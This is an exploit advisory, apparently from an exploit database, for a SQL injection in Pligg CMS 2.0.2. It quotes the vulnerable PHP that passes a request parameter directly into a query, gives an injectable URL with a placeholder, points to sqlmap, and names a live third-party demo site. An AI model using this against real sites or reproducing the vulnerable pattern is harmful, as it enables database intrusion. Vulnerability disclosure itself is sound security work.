Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection

2015-09-18 19:05:03

# Exploit Title: Pligg CMS 2.0.2 SQL injection
# Date: 29-08-2015
# Exploit Author: jsass
# Vendor Homepage: http://pligg.com
# Software Link: https://github.com/Pligg/pligg-cms/archive/2.0.2.zip
# Version: 2.0.2
# Tested on: kali sana 2.0

################ Q8 Gray Hat Team ################



SQLInjection

File : load_data_for_search.php


$search = new Search();

if(isset($_REQUEST['start_up']) and $_REQUEST['start_up']!= '' and $_REQUEST['pagesize'] != ''){

$pagesize = $_REQUEST['pagesize'];
$start_up = $_REQUEST['start_up'];
$limit = " LIMIT $start_up, $pagesize";
}
if(isset($_REQUEST['sql']) and $_REQUEST['sql']!= ''){
$sql = $_REQUEST['sql'];
$search->sql = $sql.$limit;
}

$fetch_link_summary = true;
$linksum_sql = $sql.$limit;

Exploit : http://localhost/pligg-cms-master/load_data_for_search.php?sql={SQLi}

Type Injection : Boolean & Time Based

Use SQLmap To Inject ..

Demo : http://www.pligg.science/load_data_for_search.php?sql={SQLi}


################ Q8 Gray Hat Team ################

Great's To : sec4ever.com && alm3refh.com

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.